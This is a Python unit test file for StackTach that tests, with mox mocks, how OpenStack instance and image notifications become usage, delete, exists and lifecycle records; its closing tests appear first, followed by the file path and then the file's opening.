usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_delete(self):
delete_time = datetime.datetime.utcnow()
terminated_time = delete_time-datetime.timedelta(seconds=1)
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = str(delete_time)
notification.terminated_at = str(terminated_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_with_only_terminated_at(self):
delete_time = datetime.datetime.utcnow()
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = ''
notification.terminated_at = str(delete_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_with_neither(self):
delete_time = datetime.datetime.utcnow()
launch_time = delete_time-datetime.timedelta(days=1)
launch_decimal = utils.decimal_utc(launch_time)
delete_decimal = utils.decimal_utc(delete_time)
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = ''
notification.terminated_at = str(delete_time)
notification.launched_at = str(launch_time)
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
delete.instance = INSTANCE_ID_1
delete.launched_at = launch_decimal
delete.deleted_at = delete_decimal
views.STACKDB.get_or_create_instance_delete(
instance=INSTANCE_ID_1, deleted_at=delete_decimal,
launched_at=launch_decimal)\
.AndReturn((delete, True))
views.STACKDB.save(delete)
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.assertEqual(delete.instance, INSTANCE_ID_1)
self.assertEqual(delete.launched_at, launch_decimal)
self.assertEqual(delete.deleted_at, delete_decimal)
self.mox.VerifyAll()
def test_process_delete_no_launch(self):
delete_time = datetime.datetime.utcnow()
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.deleted_at = str(delete_time)
notification.launched_at = ''
raw = self.mox.CreateMockAnything()
self.mox.ReplayAll()
views._process_delete(raw, notification)
self.mox.VerifyAll()
def _create_exists_notification(self, audit_beginning, current_time,
launch_time, deleted_time):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(launch_time)
notification.deleted_at = str(deleted_time)
notification.audit_period_beginning = str(audit_beginning)
notification.audit_period_ending = str(current_time)
notification.tenant = TENANT_ID_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.rax_options = RAX_OPTIONS_1
notification.instance = INSTANCE_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
notification.message_id = MESSAGE_ID_1
notification.bandwidth_public_out = BANDWIDTH_PUBLIC_OUTBOUND
return notification
def test_process_exists(self):
current_time = datetime.datetime.utcnow()
launch_time = current_time - datetime.timedelta(hours=23)
launch_decimal = utils.decimal_utc(launch_time)
audit_beginning = current_time - datetime.timedelta(hours=20)
audit_beginning_decimal = utils.decimal_utc(audit_beginning)
audit_ending_decimal = utils.decimal_utc(current_time)
notification = self._create_exists_notification(
audit_beginning, current_time, launch_time, deleted_time='')
raw = self.mox.CreateMockAnything()
usage = self.mox.CreateMockAnything()
launched_range = (launch_decimal, launch_decimal+1)
views.STACKDB.get_instance_usage(
instance=INSTANCE_ID_1,
launched_at__range=launched_range).AndReturn(usage)
exists_values = {
'message_id': MESSAGE_ID_1,
'instance': INSTANCE_ID_1,
'launched_at': launch_decimal,
'audit_period_beginning': audit_beginning_decimal,
'audit_period_ending': audit_ending_decimal,
'instance_type_id': INSTANCE_TYPE_ID_1,
'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
'usage': usage,
'raw': raw,
'tenant': TENANT_ID_1,
'rax_options': RAX_OPTIONS_1,
'os_architecture': OS_ARCH_1,
'os_version': OS_VERSION_1,
'os_distro': OS_DISTRO_1,
'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
}
exists = self.mox.CreateMockAnything()
views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
views.STACKDB.save(exists)
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
def test_process_exists_no_launched_at(self):
notification = self.mox.CreateMockAnything()
notification.instance = INSTANCE_ID_1
notification.launched_at = None
raw = self.mox.CreateMockAnything()
raw.id = '1'
self.setup_mock_log()
self.log.warn('Ignoring exists without launched_at. RawData(1)')
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
def test_process_exists_with_deleted_at(self):
current_time = datetime.datetime.utcnow()
launch_time = current_time - datetime.timedelta(hours=23)
launch_decimal = utils.decimal_utc(launch_time)
delete_time = datetime.datetime.utcnow()
deleted_decimal = utils.decimal_utc(delete_time)
audit_beginning = current_time - datetime.timedelta(hours=20)
audit_beginning_decimal = utils.decimal_utc(audit_beginning)
audit_ending_decimal = utils.decimal_utc(current_time)
notification = self._create_exists_notification(
audit_beginning, current_time, launch_time, delete_time)
raw = self.mox.CreateMockAnything()
usage = self.mox.CreateMockAnything()
launched_range = (launch_decimal, launch_decimal+1)
views.STACKDB.get_instance_usage(instance=INSTANCE_ID_1,
launched_at__range=launched_range)\
.AndReturn(usage)
delete = self.mox.CreateMockAnything()
views.STACKDB.get_instance_delete(instance=INSTANCE_ID_1,
launched_at__range=launched_range)\
.AndReturn(delete)
exists_values = {
'message_id': MESSAGE_ID_1,
'instance': INSTANCE_ID_1,
'launched_at': launch_decimal,
'deleted_at': deleted_decimal,
'audit_period_beginning': audit_beginning_decimal,
'audit_period_ending': audit_ending_decimal,
'instance_type_id': INSTANCE_TYPE_ID_1,
'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
'usage': usage,
'delete': delete,
'raw': raw,
'tenant': TENANT_ID_1,
'rax_options': RAX_OPTIONS_1,
'os_architecture': OS_ARCH_1,
'os_version': OS_VERSION_1,
'os_distro': OS_DISTRO_1,
'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
}
exists = self.mox.CreateMockAnything()
views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
views.STACKDB.save(exists)
self.mox.ReplayAll()
views._process_exists(raw, notification)
self.mox.VerifyAll()
class StacktachImageUsageParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_image_usage(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_usage(raw)
self.mox.ReplayAll()
views._process_glance_usage(raw, notification)
self.mox.VerifyAll()
def test_save_image_delete(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_delete(raw)
self.mox.ReplayAll()
views._process_glance_delete(raw, notification)
self.mox.VerifyAll()
def test_save_image_exists(self):
raw = self.mox.CreateMockAnything()
notification = self.mox.CreateMockAnything()
notification.save_exists(raw)
self.mox.ReplayAll()
views._process_glance_exists(raw, notification)
self.mox.VerifyAll() | tests/unit/test_stacktach.py | import datetime
import json
import mox
import utils
from utils import BANDWIDTH_PUBLIC_OUTBOUND
from utils import INSTANCE_FLAVOR_ID_1
from utils import INSTANCE_FLAVOR_ID_2
from utils import INSTANCE_ID_1
from utils import OS_VERSION_1
from utils import OS_ARCH_1
from utils import OS_DISTRO_1
from utils import RAX_OPTIONS_1
from utils import MESSAGE_ID_1
from utils import REQUEST_ID_1
from utils import TENANT_ID_1
from utils import INSTANCE_TYPE_ID_1
from utils import DUMMY_TIME
from utils import INSTANCE_TYPE_ID_2
from stacktach import stacklog, models
from stacktach import notification
from stacktach import views
from tests.unit import StacktachBaseTestCase
class StacktachRawParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def assertOnHandlerResponse(self, resp, **kwargs):
for key in kwargs:
self.assertTrue(key in resp, msg='%s not in response' % key)
self.assertEqual(resp[key], kwargs[key])
def test_process_raw_data(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25 13:38:23.123'
dict = {
'timestamp': when,
}
routing_key = 'monitor.info'
args = (routing_key, dict)
json_args = json.dumps(args)
mock_record = self.mox.CreateMockAnything()
mock_notification = self.mox.CreateMockAnything()
mock_notification.save().AndReturn(mock_record)
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(
mock_notification)
self.mox.ReplayAll()
self.assertEquals(
views.process_raw_data(deployment, args, json_args, exchange),
(mock_record, mock_notification))
self.mox.VerifyAll()
def test_process_raw_data_old_timestamp(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25T13:38:23.123'
dict = {
'_context_timestamp': when,
}
routing_key = 'monitor.info'
args = ('monitor.info', dict)
json_args = json.dumps(args[1])
mock_notification = self.mox.CreateMockAnything()
mock_notification.save()
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(mock_notification)
self.mox.ReplayAll()
views.process_raw_data(deployment, args, json_args, exchange)
self.mox.VerifyAll()
class StacktachLifecycleTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def test_start_kpi_tracking_not_update(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_from_api(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.update'
raw.service = 'compute'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='nova.example.com', service='api')
views.STACKDB.create_request_tracker(lifecycle=lifecycle,
request_id=REQUEST_ID_1,
start=when,
last_timing=None,
duration=str(0.0))\
.AndReturn(tracker)
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_using_host(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='api.example.com', service='compute')
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_update_kpi_no_trackers(self):
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([])
self.mox.ReplayAll()
views.update_kpi(None, raw)
self.mox.VerifyAll()
def test_update_kpi(self):
lifecycle = self.mox.CreateMockAnything()
end = utils.decimal_utc()
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
raw.when=end
timing = utils.create_timing(self.mox, 'compute.instance.create',
lifecycle, end_when=end)
start = utils.decimal_utc()
tracker = utils.create_tracker(self.mox, REQUEST_ID_1, lifecycle,
start)
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([tracker])
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.update_kpi(timing, raw)
self.assertEqual(tracker.request_id, REQUEST_ID_1)
self.assertEqual(tracker.lifecycle, lifecycle)
self.assertEqual(tracker.last_timing, timing)
self.assertEqual(tracker.start, start)
self.assertEqual(tracker.duration, end-start)
self.mox.VerifyAll()
def test_aggregate_lifecycle_no_instance(self):
raw = self.mox.CreateMockAnything()
raw.instance = None
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.mox.VerifyAll()
def test_aggregate_lifecycle_start(self):
event_name = 'compute.instance.create'
event = '%s.start' % event_name
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, state='building')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1)\
.AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([])
timing = utils.create_timing(self.mox, event_name, lifecycle)
views.STACKDB.create_timing(lifecycle=lifecycle, name=event_name)\
.AndReturn(timing)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'building')
self.assertEqual(lifecycle.last_task_state, '')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, raw)
self.assertEqual(timing.start_when, when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_end(self):
event_name = 'compute.instance.create'
start_event = '%s.end' % event_name
end_event = '%s.end' % event_name
start_when = datetime.datetime.utcnow()
end_when = datetime.datetime.utcnow()
start_raw = utils.create_raw(self.mox, start_when, start_event,
state='building')
end_raw = utils.create_raw(self.mox, end_when, end_event,
old_task='build')
lifecycle = utils.create_lifecycle(self.mox, INSTANCE_ID_1,
'active', '', start_raw)
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1)\
.AndReturn([lifecycle])
views.STACKDB.save(lifecycle)
timing = utils.create_timing(self.mox, event_name, lifecycle,
start_raw=start_raw,
start_when=start_when)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([timing])
self.mox.StubOutWithMock(views, "update_kpi")
views.update_kpi(timing, end_raw)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(end_raw)
self.assertEqual(lifecycle.last_raw, end_raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'build')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, start_raw)
self.assertEqual(timing.start_when, start_when)
self.assertEqual(timing.end_raw, end_raw)
self.assertEqual(timing.end_when, end_when)
self.assertEqual(timing.diff, end_when-start_when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_update(self):
event = 'compute.instance.update'
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, old_task='reboot')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1).AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
self.mox.StubOutWithMock(views, "start_kpi_tracking")
views.start_kpi_tracking(lifecycle, raw)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'reboot')
self.mox.VerifyAll()
class StacktachUsageParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
self.log = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(stacklog, 'get_logger')
def tearDown(self):
self.mox.UnsetStubs()
def setup_mock_log(self, name=None):
if name is None:
stacklog.get_logger(name=mox.IgnoreArg(),
is_parent=False).AndReturn(self.log)
else:
stacklog.get_logger(name=name,
is_parent=False).AndReturn(self.log)
def test_all_instance_events_have_mapping(self):
for key, value in views.INSTANCE_EVENT.items():
msg = "'%s' does not have a process function mapping." % value
self.assertTrue(value in views.USAGE_PROCESS_MAPPING, msg)
def _create_mock_notification(self):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(DUMMY_TIME)
notification.tenant = TENANT_ID_1
notification.rax_options = RAX_OPTIONS_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.instance = INSTANCE_ID_1
notification.request_id = REQUEST_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
return notification
def test_process_usage_for_new_launch_create_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
usage.launched_at = None
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_revert_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_rescue_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_success_message(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_error_message(self):
notification = self.mox.CreateMockAnything()
notification.message = 'Error'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.mox.VerifyAll()
def test_process_usage_for_updates_revert_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
